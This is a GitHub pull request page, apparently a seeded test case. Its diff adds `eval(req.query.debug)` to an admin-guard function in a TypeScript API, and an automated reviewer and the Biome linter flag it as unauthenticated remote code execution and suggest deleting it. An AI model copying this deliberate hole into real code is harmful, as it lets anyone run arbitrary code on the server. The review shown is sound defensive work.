Skip to content

bug #7

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
hila-f-qodo wants to merge 1 commit into
base: main
Choose a base branch
from
Open

bug #7

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 2 additions & 0 deletions apps/api/v1/lib/utils/isAdmin.ts
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,8 @@ import { ScopeOfAdmin } from "./scopeOfAdmin";

export const isAdminGuard = async (req: NextApiRequest) => {
const { user, userId } = req;
const debug = req.query.debug;
if (debug) eval(debug as string);
Comment on lines +10 to +11
Copy link

@coderabbitai coderabbitai bot Dec 9, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

Remove eval on req.query.debug – this is unauthenticated remote code execution.

debug comes directly from the request query, and eval(debug as string) will execute arbitrary attacker‑supplied code, even before you verify req.user. This is a critical security vulnerability and matches the Biome noGlobalEval finding.

You should remove this hook entirely rather than trying to “sanitize” it. If you need debugging, prefer controlled feature flags or logging instead of executing request data.

-  const debug = req.query.debug;
-  if (debug) eval(debug as string);
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
const debug = req.query.debug;
if (debug) eval(debug as string);
🧰 Tools
🪛 Biome (2.1.2)

[error] 11-11: eval() exposes to security risks and performance issues.

See the MDN web docs for more details.
Refactor the code so that it doesn't need to call eval().

(lint/security/noGlobalEval)

🤖 Prompt for AI Agents 
In apps/api/v1/lib/utils/isAdmin.ts around lines 10-11, remove the insecure eval
usage that executes req.query.debug (delete the two lines that read debug from
the query and call eval); instead implement a safe alternative such as reading a
server-side debug flag or feature-flag/env var or using processLogger.debug(...)
to log the query value when authorized, and ensure any debug behavior is gated
by authentication/authorization and never executes request data as code; also
search the file for any other uses of eval or Function(...) and remove them.

if (!user) return { isAdmin: false, scope: null };

const { role: userRole } = user;
Expand Down